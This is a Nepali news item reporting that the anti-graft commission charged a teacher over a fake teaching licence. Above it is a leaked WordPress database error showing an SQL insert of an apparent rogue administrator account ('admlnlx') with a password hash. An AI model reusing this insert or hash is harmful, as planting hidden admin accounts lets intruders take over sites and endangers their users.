WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2KZZBViaSnQzLKTITdyw8Yu6jiRer1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:04:11', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७ –
अख्तियार दुरुपयोग अनुसन्धान आयोगले शिक्षक इन्दल कुमारविरुद्ध माध्यमिक तहको नक्कली शैक्षिक अध्यापन अनुमति पत्रको प्रमाणपत्र पेस गरी भ्रष्टाचार गरेको आरोपसहित आज विशेष अदालत काठमाडौँमा आरोपपत्र दायर गरेको छ ।
जलदेवी माध्यमिक विद्यालय, खनियापानी रामेछापमा कार्यरत निम्न माध्यमिक विद्यालय तहका शिक्षक कुमारले भ्रष्टाचारसम्बन्धी कसुर गरेको देखिएको दलिलसहित आयोगले आरोपपत्रमा भ्रष्टाचार निवारण ऐन, २०५९ को दफा १६ को उपदफा ९१० बमोजिम सजाय हुनुपर्ने माग गरेको छ । – रासस